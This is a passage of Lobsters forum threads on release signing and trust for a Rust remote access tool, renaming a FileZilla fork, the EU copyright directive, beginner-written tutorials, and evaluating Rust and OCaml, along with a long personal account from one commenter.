                                                                                                          The other heuristic is that unproven or unevaluatable people publishing new protocols get it wrong in security-breaking ways. This happens so much it should be assumed by default. Insecurity should be assumed by default anyway but especially with unknown developers. Again, the best route is evaluating the protocol and code itself. That said, people have a working protocol already with limited time on their hands. The heuristic might be used to save time avoiding unestablished or unvetted authors’ work since 99+% it will be broken anyway. In this case, avoiding work based on strange author is about saving time and/or avoiding insecurity.

                                                                                                          So, there’s two ways of looking at the unknown author that would lead one to avoid their work until someone with right skills and spare time to donate evaluates it carefully.

                                                                                                          1. 3

                                                                                                            That’s certainly fair. I don’t really disagree with any of that. I’m not suggesting anyone feel like wasting their time, only that critiques be on-point and people not be berated for doing good work (if that’s what they did).

                                                                                                            Speaking of on-point critiques, I’m surprised nobody raised the concern that these releases are not GPG signed. That should be standard practice for all software, and certainly security-critical software.

                                                                                                            1. 1

                                                                                                              I’m surprised nobody raised the concern that these releases are not GPG signed.

                                                                                                              Unless this, more or less anonymous person, has a key signed by many trusted keys / people, how would that increase trust?

                                                                                                              My points above about package servers signing, or at least providing checksums, points at trust in the actual distributed assets. I may not trust the particular $SIGNER of a package, but I might trust others who trust $SIGNER, and accept that if $THEY trust $SIGNER, it’s probably OK for me to trust $SIGNER, too. That’s the model of the Web of Trust, and the model that every package server I know of (whether it be from freebsd, openbsd, or some random GNU/Linux distribution) works.

                                                                                                              1. 1

                                                                                                                The point of GPG signing releases has nothing to do with web-of-trust.

                                                                                                                It is about establishing a direct line of trust to the author of the software to protect against third-party tampering. It doesn’t matter if they’re anonymous.

                                                                                                                1. 1

                                                                                                                  Yeah, agreed. I honestly think it’s quite frustrating how GPG entangles web-of-trust with its other features. It creates a lot of confusion.

                                                                                                                  1. 2

                                                                                                                    @itistoday, earlier in this long thread you suggest:

                                                                                                                    Which, incidentally, has the exact same trust assumptions (X.509) as the downloaded binary.

                                                                                                                    (To be clear: this was in response to download the binary, vs download the source and compile the binary)

                                                                                                                    So, you trust the author’s X.509 certificate enough to assume it’s not tampered with on download, but don’t trust the author put it there in the first place? And, who, even has the authority to make a release? We don’t know! So, we still have to be suspicious even if it’s signed.

                                                                                                                    Let’s discuss this scenario:

                                                                                                                    I’m a l33t h4x0r and I pwn3d oxy-secure.app’s servers. I want to put a rouge oxy up there. Since the key who signed the old oxy binary is just a one off anyway (because it’s unknown to everyone), I’ll sign my malicious oxy binary with a one off key, too, and update the HTML referencing how to get this new key! My l33t social engineering skills suggest that I should use the same email address and for the name, use “Original Name - NEW KEY” (or something else that implies I’m still the same person, I just made a mistake)

                                                                                                                    $ gpg --gen-key
                                                                                                                    ...
                                                                                                                    $ gpg --sign malicious-oxy
                                                                                                                    

                                                                                                                    I replace https://oxy-secure.app/oxy , and the signature file with my malicious ones, and even publish my new public key somewhere, and no one is the wiser! (I then twist my handlebar mustache, and let out an evil snicker)

                                                                                                                    NOW, if as a user, I happened to import the previous signing key, I might notice that this is different and it might raise some eyebrows. Just like I might notice that the SSL cert’s fingerprint changed as it started pointing to my server oxy-notsosecure.app/oxy… But, given this author is unknown, I also might not bat an eye at my plausible explanation of: “oh, what an idiot! They forgot to backup their key!”

                                                                                                                    If I’m being fair, yes, a signed binary, even with an unestablished key can help here. It introduces additional levels of potential doubt at the authenticity of the binary. But, even if the original oxy is signed, I’m still taking a giant risk by accepting the fact that I’m downloading a random binary from the internet built by some random anonymous person, and they may (or may not) have malicious intent, or not have the skills to back up the claims they’ve made (in the case where it’s actually not malicious intent).

                                                                                                                    If the key is known to other people I know, as it’s part of the web of trust, it’s a little easier to believe that the risk is less malicious intent and more, “the author might still be making exuberant claims.”

                                                                                                          2. 1

                                                                                                            This is no longer productive, and I am taking your response as:

                                                                                                            a) my concern is irrelevant b) I’ll have egg on my face when this turns out to be the RAT that saves us all.

                                                                                                            In response, I am just going to invite you to @akpoff’s well written comment, which also expresses concerns. Maybe they are more “relevant”: https://lobste.rs/s/3hrwqf/oxy_security_focused_remote_access_tool#c_0hsv4p

                                                                                              1. 4

                                                                                                Adding an obvious link to the github page I think would also make a worthwhile addition. It wasn’t until reading the comments here on lobste.rs that I realized this was open source. I was assuming I had to take the authors word for it when they said it was written in rust etc.

                                                                                                For the record, here’s the github page if anyone else fell victim: https://github.com/oxy-secure/oxy

                                                                                                1. 2

                                                                                                  I was assuming I had to take the authors word for it when they said it was written in rust etc.

                                                                                                  This sounds like a dangerous mindset. Rust is likely a safer language for writing software that talks to the network, than, say C. However, which language it’s written in has no bearing on the numerous claims it makes about its security and stature as a “secure” RAT…well, other than the memory safety claim…assuming it doesn’t use unsafe anywhere, of course.

                                                                                                  1. 0

                                                                                                    Calm down broham. I don’t believe everything I read on the Internet.

                                                                                                1. 17

                                                                                                  You’d save yourself a lot of trouble upfront not borrowing the filezilla name - it’s trademarked. Already there’s an argument for whether “-ng” postfix constitutes a new mark, why bother even having it. Just completely rename it

                                                                                                  Hilariously their trademark policy seems to prohibit their use of their own name

                                                                                                  1. 3

                                                                                                    Oh, great point. We will need to think of a new name.

                                                                                                    How about godzilla-ftp.

                                                                                                    1. 14

                                                                                                      How about filemander? It’s still in the same vein as “zilla,” but far more modest. The fact that you’re refusing cruft, provides a sense of modesty.

                                                                                                      Also, “mander” and “minder” — minder maybe isn’t exactly right for an FTP client, but it’s not completely wrong…

                                                                                                      1. 4

                                                                                                        filemander

                                                                                                        Great name! A quick ddg search does not show any existing projects using it.

                                                                                                        1. 1

                                                                                                          And it sounds a bit like “fire mander”, which ties in well with the mythological connections between salamanders and fire.

                                                                                                          1. 1

                                                                                                            Yeah, the intention was to have a cute salamander logo–way more modest a lizard than a “SOMETHINGzilla!”

                                                                                                        2. 8
                                                                                                          1. 5

                                                                                                            Just remember to make sure it’s easy for random people to remember and spell. They’ll be Googling it at some point.

                                                                                                        1. 6

                                                                                                          Team lobste.rs, @lattera, @nickpsecurity?

                                                                                                          1. 5

                                                                                                            Haha. I would love it if I had the time to play. Perhaps next year. Thanks for the ping, though. I’ve forwarded this on to a few of my coworkers who play CTFs.

                                                                                                            1. 4

                                                                                                              I’d love to if I hadn’t lost my memory, including of hacking, to that injury. I never relearned it since I was all-in with high-assurance security at that point which made stuff immune to almost everything hackers did. If I still remembered, I’d have totally been down for a Lobsters hacking crew. I’d bring a dozen types of covert channels with me, too. One of my favorite ways to leak small things was putting it in plain text into TCP/IP headers and/or throttling of what otherwise is boring traffic vetted by NIDS and human eye. Or maybe in HTTPS traffic where they said, “Damn, if only I could see inside it to assess it” while the data was outside encoded but unencrypted. Just loved doing the sneakiest stuff with the most esoteric methods I could find with much dark irony.

                                                                                                              I will be relearning coding and probably C at some point in future to implement some important ideas. I planned on pinging you to assess the methods and tooling if I build them. From there, might use it in some kind of secure coding or code smashing challenge.

                                                                                                              1. 5

                                                                                                                I’m having a hard time unpacking this post, and am really starting to get suspicious of who you are, nickpsecurity. Maybe I’ve missed some background posts of yours that explains more, and provides better context, but this comment (like many others) comes off…almost Markovian (as in chain).

                                                                                                                “If I hadn’t lost my memory…” — of all the people on Lobsters, you seem to have the best recall. You regularly cite papers on a wide range of formal methods topics, old operating systems, security, and even in this post discuss techniques for “hacking” which, just sentences before “you can’t remember how to do.”

                                                                                                                You regularly write essays as comments…some of which are almost tangential to the main point being made. These essays are cranked out at a somewhat alarming pace. But I’ve never seen an “authored by” submitted by you pointing outside of Lobsters.

                                                                                                                You then claim that you need to relearn coding, and “probably C” to implement important ideas. I’ve seen comments recently where you ask about Go and Rust, but would expect, given the number of submissions on those topics specifically, you’d have wide ranging opinions on them, and would be able to compare and contrast both with Modula, Ada, and even Oberon (languages that I either remember you discussing, or come from an era/industry that you often cite techniques from).

                                                                                                                I really, really hate to have doubt about you here, but I am starting to believe that we’ve all been had (don’t get me wrong, we’ve all learned things from your contributions!). As far as I’ve seen, you’ve been incredibly vague with your background (and privacy is your right!). But, that also makes it all the more easy to believe that there is something fishy with your story…

                                                                                                                1. 11

                                                                                                                  I’m not hiding much past what’s private or activates distracting biases. I’ve been clear when asked on Schneier’s blog, HN, maybe here that I don’t work in the security industry: I’m an independent researcher who did occasional gigs if people wanted me to. I mostly engineered prototypes to test my ideas. Did plenty of programming and hacking when younger for the common reasons and pleasures of it. I stayed in jobs that let me interact with lots of people. Goal was social research and outreach on big problems of the time like a police state forming post-9/11 which I used to write about online under aliases even more than tech. I suspected tech couldn’t solve the problems created by laws and media. Had to understand how many people thought, testing different messages. Plus, jobs allowing lots of networking mean you meet business folks, fun folks, you name it. A few other motivations, too.

                                                                                                                  Simultaneously, I was amassing as much knowledge as I could about security, programming, and such trying to solve the hardest problems in those fields. I gave up hacking since its methods were mostly repetitive and boring compared to designing methods to make hacking “impossible.” Originally a mix of public benefit and ego, I’d try to build on work by folks like Paul Karger to beat the worlds’ brightest people at their game one root cause at a time until a toolbox of methods and proven designs would solve the whole problem. I have a natural, savant-like talent for absorbing and integrating tons of information but a weakness for focusing on doing one thing over time to mature implementation. One is exciting, one is draining after a while. So, I just shared what I learned with builders as I figured it out with lots of meta-research. My studies of work of master researchers and engineers aimed to solve both individual solutions in security/programming (eg secure kernels or high-productivity) on top of looking for ways to integrate them like a unified, field theory of sorts. Wise friends kept telling me to just build one or more of these to completion (“focus Nick!”). Probably right but I’d have never learned all I have if I did. What you see me post is what I learned during all the time I wasn’t doing security consulting, building FOSS, or something else people pushed.

                                                                                                                  Unfortunately, right before I started to go for production stuff beyond prototypes, I took a brain injury in an accident years back that cost me most of my memory, muscle memory, hand-eye coordination, reflexes, etc. Gave me severe PTSD, too. I can’t remember most of my life. It was my second, great tragedy after a triple HD failure in a month or two that cost me my data. All I have past my online writings are mental fragments of what I learned and did. Sometimes I don’t know where they came from. One of the local hackers said I was the Jason Bourne of INFOSEC: didn’t know shit about my identity or methods but what’s left in there just fires in some contexts for some ass-kicking stuff. I also randomly retain new stuff that builds on it. Long as it’s tied to strong memories, I’ll remember it for some period of time. The stuff I write-up helps, too, which mostly went on Schneier’s blog and other spaces since some talented engineers from high-security were there delivering great peer review. Made a habit out of what worked. I put some on HN and Lobsters (including authored by’s). They’re just text files on my computer right now that are copies of what I told people or posted. I send them to people on request.

                                                                                                                  Now, a lot of people just get depressed, stop participating in life as a whole, and/or occasionally kill themselves. I had a house to keep in a shitty job that went from a research curiosity to a necessity since I didn’t remember admining, coding, etc. I tried to learn C# in a few weeks for a job once like I could’ve before. Just gave me massive headaches. It was clear I’d have to learn a piece at a time like I guess is normal for most folks. I wasn’t ready to accept it plus had a job to re-learn already. So, I had to re-learn the skills of my existing job (thank goodness for docs!), some people stuff, and so on to survive while others were trying to take my job. Fearing discrimination for disability, I didn’t even tell my coworkers about the accident. I just let them assume I was mentally off due to stress many of us were feeling as Recession led to layoffs in and around our households. I still don’t tell people until after I’m clearly a high-performer in the new context. Pointless since there’s no cure they could give but plenty of downsides to sharing it.

                                                                                                                  I transitioned out of that to other situations. Kind of floated around keeping the steady job for its research value. Drank a lot since I can’t choose what memories I keep and what I have goes away fast. A lot of motivation to learn stuff if I can’t keep it, eh? What you see are stuff I repeated the most for years on end teaching people fundamentals of INFOSEC and stuff. It sticks mostly. Now, I could’ve just piece by piece relearned some tech in a focused area, got a job in that, built up gradually, transitioned positions, etc… basically what non-savants do is what I’d have to do. Friends kept encouraging that. Still had things to learn talking to people especially where politics were going in lots of places. Still had R&D to do on trying to find the right set of assurance techniques for right components that could let people crank out high-security solutions quickly and market competitive. All the damage in media indicated that. Snowden leaks confirmed most of my ideas would’ve worked while most of security community’s recommendations not addressing root causes were being regularly compromised as those taught me predicted. So, I stayed on that out of perceived necessity that not enough people were doing it.

                                                                                                                  The old job and situation are more a burden now than useful. Sticking with it to do the research cost me a ton. I don’t think there’s much more to learn there. So, I plan to move on. One, social project failed in unexpected way late last year that was pretty depressing in its implications. I might take it up again since a lot of people might benefit. I’m also considering how I might pivot into a research position where I have time and energy to turn prior work into something useful. That might be Brute-Force Assurance, a secure (thing here), a better version of something like LISP/Smalltalk addressing reasons for low uptake, and so on. Each project idea has totally different prerequisites that would strain my damaged brain to learn or relearn. Given prior work and where tech is at, I’m leaning most toward a combo of BFA with a C variant done more like live coding, maybe embedded in something like Racket. One could rapidly iterate on code that extracted to C with about every method and tool available thrown at it for safety/security checks.

                                                                                                                  So, it’s a mix of indecision and my work/life leaving me feeling exhausted all the time. Writing up stuff on HN, Lobsters, etc about what’s still clear in my memory is easy and rejuvenating in comparison. I also see people use it on occasion with some set to maybe make waves. People also send me emails or private messages in gratitude. So, probably not doing what I need to be doing but folks were benefiting from me sharing pieces of my research results. So, there it is all laid out for you. A person outside security industry going Ramanujan on INFOSEC and programming looking for its UFT of getting shit done fast, correct, and secure (“have it all!”) while having day job(s) about meeting, understanding, and influencing people for protecting or improving democracy. Plus, just the life experiences of all that. It was fun while it lasted. Occasionally so now but more rare.

                                                                                                                  1. 4

                                                                                                                    Thank you for sharing your story! It provides a lot of useful context for understanding your perspective in your comments.

                                                                                                                    Putting my troll hat on for a second, what you’ve written would also make a great cover story if you were a human/AI hybrid. Just saying. :)

                                                                                                                    1. 1

                                                                                                                      Sure. Im strange and seemingly contradictory enough that I expect confusion or skepticism. It makes sense for people to wonder. Im glad you asked since I needed to do a thorough writeup on it to link to vs scattered comments on many sites.

                                                                                                                  2. 0

                                                                                                                    I have to admit similar misgivings (unsurprisingly, I came here via @apg and know @apg IRL). For someone so prolific and opinionated you have very little presence beyond commenting on the internet. To me, that feels suspicious, but who knows. I’m actually kind of hoping you’re some epic AI model and we’re the test subjects.

                                                                                                                    1. 0

                                                                                                                      Occam’s Razor applies. ‘A very bright human bullshitter’ is more likely than somebody’s research project.

                                                                                                                      @nickpsecurity, have you considered “I do not choose to compete” instead of “If only I hadn’t had that memory loss”?

                                                                                                                      I, for one, will forgive and forget what I’ve seen so far. (TBH, I’m hardly paying attention anyway.)

                                                                                                                      But, lies have a way of growing, and there is some line down the road where forgive-and-forget becomes GTFO.

                                                                                                                      1. 1

                                                                                                                        have you considered “I do not choose to compete” instead of “If only I hadn’t had that memory loss”?

                                                                                                                        I did say the way my mind works makes it really hard to focus on long-term projects to completion. Also, I probably should’ve been doing some official submissions in ACM/IEEE but polishing and conferencing was a lot of work distracting from the fun/important research. If I’m reading you right, it’s accurate to say I wasn’t trying to compete in academia, market, or social club that is the security industry on top of memory loss. I was operating at a severe handicap. So, I’d (a) do those tedious, boring, distracting, sometimes-political things with that handicap or (b) keep doing what I was doing, enjoying, and provably good at despite my troubles. I kept going with (b).

                                                                                                                        That was the decision until recently when I started looking at doing some real, public projects. Still in the planning/indecision phase on that.

                                                                                                                        “But, lies have a way of growing, and there is some line down the road where forgive-and-forget becomes GTFO.”

                                                                                                                        I did most of my bullshitting when I was a young hacker trying to get started. Quite opposite of your claim, the snobby, elitist, ego-centered groups I had to start with told you to GTFO by default unless you said what they said, did what they expected, and so on. I found hacker culture to be full of bullshit beliefs and practices with no evidence backing them. That’s true to this day. Just getting in to few opportunities I had required me to talk big… being a loud wolf facing other wolves… plus deliver on a lot of it just to not be filtered. I’d have likely never entered INFOSEC or verification otherwise. Other times have been personal failures that required humiliating retractions and apologies when I got busted. I actually care about avoiding unnecessary harm or aggravation to decent people. I’m sure more failures will come out over time with them costing me but there will be a clear difference between old and newer me. Since I recognize my failure there, I’m focusing on security BSing for rest of comment since it’s most relevant here.

                                                                                                                        The now, especially over past five years or so, has been me sharing hard-won knowledge with people with citations. Most of the BS is stuff security professionals say without evidence that I counter with evidence. Many of their recommendations got trashed by hackers with quite a few of mine working or working better. Especially on memory safety, small TCB’s, covert channels, and obfuscation. I got much early karma on HN in particular mainly countering BS in fads, topics/people w/ special treatment, echo chambers, and so on. My stuff stayed greyed out but I had references. They usually got upvoted back by the evening. To this day, I get emails thanking me for doing what they said they couldn’t since any dissenting opinion on specific topics or individuals would get slammed. My mostly-civil, evidence-based style survived. Some BS actually declined a bit since we countered it so often. Just recently had to counter a staged comparison here which is at 12 votes worth of gratitude, high for HN dissenters. The people I counter include high-profile folks in security industry who are totally full of shit on certain topics. Some won’t relent no matter who concrete the evidence is since it’s a game or something to them. Although I get ego out of being right, I mainly do this since I think safe, secure systems are a necessary, public good. I want to know what really works, get that out there, and see it widely deployed.

                                                                                                                        If anything, I think my being a bullshitting hacker/programmer early on was a mix of justified and maybe overdoing it vs a flaw I should’ve avoided. I was facing locals and an industry that’s more like a fraternity than meritocracy, itself constantly reinforcing bullshit and GTFO’ing dissenters. With my learning abilities and obsession, I got real knowledge and skills pretty quickly switching to current style of just teaching what I learned in a variety of fields with tons of brainstorming and private research. Irritated by constant BS, I’ve swung way in the other direction by constantly countering BS in IT/INFOSEC/politics while being much more open about personal situation in ways that can cost me. I also turned down quite a few jobs offers for likely five to six digits telling them I was a researcher “outside of industry” who had “forgotten or atrophied many hands-on skills.” I straight-up tell them I’d be afraid to fuck up their systems by forgetting little, important details that only experience (and working memory) gives you. Mainly admining or networking stuff for that. I could probably re-learn safe/secure C coding or something enough to not screw up commercial projects if I stayed focused on it. Esp FOSS practice.

                                                                                                                        So, what you think? I had justification for at least some of my early bullshit quite like playing the part for job interviews w/ HR drones? Or should’ve been honest enough that I never learned or showed up here? There might be middle ground but that cost seems likely given past circumstances. I think my early deceptions or occasional fuckups are outweighed by the knowledge/wisdom I obtained and shared. It definitely helped quite a few people whereas talking big to gain entry did no damage that I can tell. I wasn’t giving bad advice or anything: just a mix of storytelling with letting their own perceptions seem true. Almost all of them are way in my past. So, really curious what you think of how justified someone entering a group of bullshitters with arbitrary, filtering criteria is justified in out-bullshiting and out-performing them to gain useful knowledge and skills? That part specifically.

                                                                                                                        1. 2

                                                                                                                          As a self-piloted, ambulatory tower of nano machines inhabiting the surface of a wet rock hurtling through outer space, I have zero time for BS in any context. Sorry.

                                                                                                                          I do have time for former BSers who quit doing it because they realized that none of these other mechanical wonders around them are actually any better or worse at being what they are. We’re all on this rock together.

                                                                                                                          p.s. the inside of the rock is molten. w t actual f? :D

                                                                                                                          1. 2

                                                                                                                            Actually, come to think of it, I will sit around and B.S. for hours, in person with close friends, for fun. Basically just playing language games that have no rules. It probably helps that all the players love each other. That kind of BS is fine.

                                                                                                                            1. 1

                                                                                                                              I somehow missed this comment before or was dealing with too much stuff to respond. You and I may have some of that in common since I do it for fun. I don’t count that as BS people want to avoid so much as just entertainment since I always end with a signal its bullshit. People know it’s fake unless tricking them is part of our game, esp if I owe them a “Damnit!” or two. Even then, it’s still something we’re doing voluntarily for fun.

                                                                                                                              My day-to-day style is a satirist like popular artists doing controversial comedy or references. I just string ideas together to make people laugh, wonder, or shock them. Same skill that lets me mix and match tech ideas. If shocking stuff bothers them, tone it way down so they’re as comfortable as they let others be. Otherwise, I’m testing their boundaries with stuff making them react somewhere between hysterical laughter and “Wow. Damn…” People tell me I should Twitter the stuff or something. Prolly right again but haven’t done it. Friends and coworkers were plenty fun to entertain without any extra burdens.

                                                                                                                              One thing about sites like this is staying civil and informational actually makes me hide that part of my style a lot since it might piss a lot of people off or risk deleting my account. I mostly can’t even joke here since it just doesn’t come across right. People interpret via impression those informational or political posts gave vs my in-person, satirical style that heavily leans on non-tech references, verbal delivery, and/or body language. Small numbers of people face-to-face instead of a random crowd, too, most of the time. I seem to fit into that medium better. And trying to be low-noise and low-provocation on this site in particular since I think it has more value that way.

                                                                                                                              Just figured I’d mention that since we were talking about this stuff. I work in a pretty toxic environment. In it, I’m probably the champion of burning jerks with improv and comebacks. Even most naysayers pay attention with their eyes and some smirks saying they look forward to next quip. I’m a mix of informative, critical, random entertainment, and careful boundary pushing just to learn about people. There’s more to it than that. Accurate enough for our purposes I think.

                                                                                                                            2. 1

                                                                                                                              Lmao. Alright. We should get along fine then given I use this site for brainstorming, informing, and countering as I described. :)

                                                                                                                              And yeah it trips me out that life is sitting on a molten, gushing thing being supplied energy by piles of hydrogen bombs going off in a space set to maybe expand into our atmosphere at some point. That is if a stray star doesn’t send us whirling out of orbit. Standing in the way of all of this is the ingenuity of what appear to be ants on a space rock whose combined brainpower got a few off of it and then back on a few times. They have plans for their pet rock. Meanwhile, they scurry around on it making all kinds of different visual, IR, and RF patterns for space tourists to watch for a space buck a show.

                                                                                                                1. 34

                                                                                                                  please don’t. When learning you make a lot of mistakes. And writing a tutorial with this mistakes doesn’t help other learners when they read this.

                                                                                                                  1. 12

                                                                                                                    And even if you don’t make mistakes, most people will misunderstand their own process and come up with unhelpful things like monad tutorials: https://byorgey.wordpress.com/2009/01/12/abstraction-intuition-and-the-monad-tutorial-fallacy/

                                                                                                                    But now Joe goes and writes a monad tutorial called “Monads are Burritos,” under the well-intentioned but mistaken assumption that if other people read his magical insight, learning about monads will be a snap for them.

                                                                                                                    1. 7

                                                                                                                      Came here to say something similar to this.

                                                                                                                      Learn new technology through writing a tutorial about it, but don’t publish it.

                                                                                                                      There’s so much misinformation by well-intentioned learners.

                                                                                                                      I’m not trying to diminish the importance of journaling either! Journaling != Tutorials.

                                                                                                                      1. 7

                                                                                                                        Publishing your tutorial gives it an audience, which means someone may (hopefully!) come along and correct you on your errors. This is invaluable.

                                                                                                                        I also disagree with this negativity. Make it clear at the top of your tutorial that you’re a beginner and you may not have it all right. But with that caveat, publish away.

                                                                                                                        1. 3

                                                                                                                          I think we’re discussing the same thing but disagreeing on the semantics of it.

                                                                                                                          • Belief #1: Sharing how you learned something can be a valuable tool to someone else.
                                                                                                                          • Belief #2: Tutorials can seem like they’re from a source of authority, so a lack of a disclaimer could be hazardous.
                                                                                                                          • Belief #3: Imposter syndrome is real. We need to mitigate misinformation, but not at the expense of people being afraid to share.
                                                                                                                          1. 1

                                                                                                                            Publishing your tutorial gives it an audience, which means someone may (hopefully!) come along and correct you on your errors. This is invaluable.

                                                                                                                            Absolutely invaluable, but at the very same time, the exposure spreads the misinformation to more readers, potentially doing more harm than good. I don’t think a disclaimer is enough. I think the word “tutorial” implies some authority, unfortunately.

                                                                                                                            I think a better way is to humbly share a report of your findings so far, with questions and an (as appropriate) admission that you don’t understand everything. Julia Evans is masterful at this style.

                                                                                                                            As a reader new to the topic, you get the benefit of an explanation of what she currently understands (which is often from a beginner’s mind), and usually some questions to seek answers to on your own. As an expert of the topic, you are invited to share more, or clarify, or correct (and this happens a lot on twitter, and/or HN, etc). But you’re doing so from a place of empathy (you want to be helpful) instead of from a place of disgust (ugh! why is this tutorial so bad!).

                                                                                                                      1. -5

                                                                                                                        It is only a disaster if your business relies on making use of other people work, in which they own the copyright.

                                                                                                                        Not everybody can afford to create stuff and give it away for free, and there are plenty of people who want to earn money from there creative work.

                                                                                                                        Those who have made a living from steeling other peoples’ material are up in arms that their free lunch not going to be free anymore.

                                                                                                                        1. 17

                                                                                                                          Or you run any kind of site where users can input anything that another visitor can see. Not just video and file sharing sites; Lobsters users could paste copyrighted content into a comment/PM and I’d be liable for not having a system implementing some kind of copyright controls.

                                                                                                                          (To say nothing of Article 11 wanting us to start paying the news sites we link to for privilege of sending them traffic.)

                                                                                                                          1. -2

                                                                                                                            If somebody posted something here that I owned the copyright to, and I asked Lobsters admin to remove the material, then I imagine they would. If somebody kept posting this material they could be banned.

                                                                                                                            Or are you saying that the Lobsters’ site should be a place where anybody can post copyright material, without any recourse by the copyright holder?

                                                                                                                            1. 13

                                                                                                                              The new law changes this standard safe harbor behavior. Lobsters (me) is presumptively at fault for copyright infringement for not proactively checking for possibly-copyrighted material before posting. So yes, your scenario is the current, reasonable law and accurately describes why everyone is concerned about this change.

                                                                                                                              1. -2

                                                                                                                                Lots of FUD being generated by those who will lose out. Copyright holders not making much noise about the fact they will probably make some money (or rather lose less).

                                                                                                                                Some good points about what is going on.

                                                                                                                              2. 4

                                                                                                                                The law isn’t about that, though. The new law doesn’t say admins must take-down on request (that’s already the case under existing law) but rather that they must have an AI system that prevents any infringing uploads from happening in the first place.

                                                                                                                                The link tax is a much bigger problem, especially lobsters, but both articles are very bad.

                                                                                                                                1. 1

                                                                                                                                  AI system that prevents any infringing uploads from happening in the first place.

                                                                                                                                  How is that any different from what @pushcx said? As the owner/operator of lobste.rs he would have to abide by this law and produce, or buy access to some sort of copyrighted work database in order to test for it for all content that is created on lobsters.

                                                                                                                                  That’s not going to make it easy for startups. That’s not going to make it easy for privately owned, independent side projects. That’s just going to hurt.

                                                                                                                                  1. 2

                                                                                                                                    ALSO, you’d better not quote any part of my message if you reply, because I could, apparently, legitimately sue lobsters for not enforcing my copyright. e.g. there’s no such thing as fair use anymore.

                                                                                                                                    (yes, that’s a stretch, but that seems to be the basic threat)

                                                                                                                                    1. 1

                                                                                                                                      I replied before @pushcx and yes, it seems we agree on how bad it is :)

                                                                                                                                      1. 2

                                                                                                                                        Blargh! I am sorry. I misread the thread and thought you were replying to pushcx.

                                                                                                                              3. 6

                                                                                                                                Or lobster gets a fine when you submit a link to any European news sites.

                                                                                                                                1. 1

                                                                                                                                  What’s worse is that people will devise a way to signal what content is linkable and what only with license. This will limit quality news dissemination and strengthen fake news position. This will help to kill EU. Sad, right?

                                                                                                                                2. 1

                                                                                                                                  most probably that lobster will be not able to post most of the links

                                                                                                                                1. 7

                                                                                                                                  I don’t understand why OP didn’t actually progress from the “evaluating Rust based on online documentation” stage to the “trying to implement a solution in Rust” stage. The exact issue being looked at, responding to certain OS signals, is entirely trivial due to this crate, which came up with a simple DDG search.

                                                                                                                                  If the language has the problem that people are fighting with the language in order to become productive with it, perhaps something is wrong with the language, and not the programmers?

                                                                                                                                  This misses the point. Rust is opinionated about how code should handle sharing access to data, and about when data should be shared rather than copied. It has been observed that people often take time to adjust to this, which is noted in the docs. I don’t see why that’s an issue.

                                                                                                                                  1. 9

                                                                                                                                    I don’t understand why OP didn’t actually progress from the “evaluating Rust based on online documentation” stage to the “trying to implement a solution in Rust” stage.

                                                                                                                                    Author provided a solution in Rust…did you not read the whole article?

                                                                                                                                    1. 3

                                                                                                                                      He did a somewhat superficial research on what libraries or crates could be used though.

                                                                                                                                      It is the same with ocaml/reason actually: he complains about the lack of a build system but the vast majority of packages are now using dune/jbuilder that is trivial to learn and use, well documented and extremely powerful, and he does not even mention it. He picks Containers as standard library replacement but it seems unclear to me if he has even evaluated base or core for example (even if I like containers myself). He also mention the introduction of multicore as something present even though it is nit yet part of the runtime yet

                                                                                                                                      1. 8

                                                                                                                                        somewhat superficial research

                                                                                                                                        I think that’s pretty realistic for almost anyone in the same situation though. If I’m trying to decide between 3 or 4 different languages for a task that needed to be done yesterday, how much time do I really have to learn all the nuances of the ecosystem?

                                                                                                                                        So, yeah, complain that he didn’t know about X, or didn’t know about Y… But, really, if you are a member of the Z community for which X and Y is relevant, instead of complaining that people missed this well known tool, help make sure that a newcomer’s first introduction to Z informs them of X and Y. That’d be super helpful.

                                                                                                                                        1. 1

                                                                                                                                          I agree with you, but I think the three communities mentioned above are doing the best to make sure that this is the case.

                                                                                                                                          And about the reason/ocaml stuff, what I mention appears in most reason tutorials, almost every package and any recent blog or forum thread, and there are dozen of discussions on the current lack of multicore, so I still believe the research was superficial.

                                                                                                                                          This said, I wasn’t claiming that the post is bad per se, I have found it quite interesting and I agree that the current situation is not bad but still suboptimal. I was actually pleasantly surprised to see that he dod actually implement some quite non trivial example code in all those, and even contributed to pony!

                                                                                                                                          EDIT: updated twice to try and clarify my complaints

                                                                                                                                      2. 2

                                                                                                                                        Your question confused me for quite a while, as I was unable to find this Rust solution in the article, despite multiple reloads. The page looks like this to me: https://leotindall.com/static/noRustVersion.png

                                                                                                                                        Eventually, I looked at it on my mobile phone where, mysteriously, there is a code snippet. I was baffled until I realized that, indeed, the only difference between my mobile device and my laptop is… I have JavaScript disabled in my browser on my laptop.

                                                                                                                                        So, my apologies to OP on this one. I was unfair. On the other hand, this serves as a great cautionary tale: make sure your site works without JavaScript.

                                                                                                                                        1. 2

                                                                                                                                          make sure your site works without JavaScript.

                                                                                                                                          Why draw the line at Javascript?

                                                                                                                                          1. 1

                                                                                                                                            Not him, so I can only answer for myself.

                                                                                                                                            JavaScript is turing complete, so it can do everything and can communicate results outside my control, so I want the ability to stop that.

                                                                                                                                            CSS is also turing complete, but AFAIK it can’t communicate outside without JavaScript, and unlike JavaScript it’s really hard to make it do something crazy like mine bitcoin (which with JavaScript is very easy to do).

                                                                                                                                            1. 7

                                                                                                                                              Now I want to write a Bitcoin miner in pure-CSS.

                                                                                                                                              CSS is also turing complete, but AFAIK it can’t communicate outside without JavaScript

                                                                                                                                              Enter: CSS Exfil and friends.

                                                                                                                                              1. 1

                                                                                                                                                Good lord.

                                                                                                                                            2. 1

                                                                                                                                              You’re right, I should revise that statement: make sure your site works without requiring me to allow you to execute arbitrary code just to read an article you wrote.

                                                                                                                                              To be clear, there is an obvious tradeoff here: syntax highlight on the server side is annoying. My blog solves this by having an acceptable no-JS fallback that is less pretty but is not missing content.

                                                                                                                                            3. 1

                                                                                                                                              That sure would be confusing! It looks like the author embedded a gist, rather than using Medium’s code tool. I assume you can embed code in Medium without JavaScript….

                                                                                                                                        1. 8

                                                                                                                                          All of the times I’ve upgraded my personal computer in the last two decades have been because my web browser, of all things, got slow to the point of annoyance. Didn’t need better graphics, a bigger disk, or more RAM for VMs at all. Just faster browsing.

                                                                                                                                          I don’t know how much I trust this “cloc” tool, though. I’ve used it a few times and found it to sometimes wildly inaccurate. (I mean, even considering what a generally useless metric “lines of code” is anyway.) For example, I’m going to be quite surprised if either Chrome or Firefox have any Visual Basic, C Shell, Tcl/Tk, or Pascal in them.

                                                                                                                                          Or, if they do, it would be more interesting to know what those files are for.

                                                                                                                                          1. 3

                                                                                                                                            My guess is that the dependencies are bundled in the repo, and they have all the other stuff that seems out of place.

                                                                                                                                            1. 1

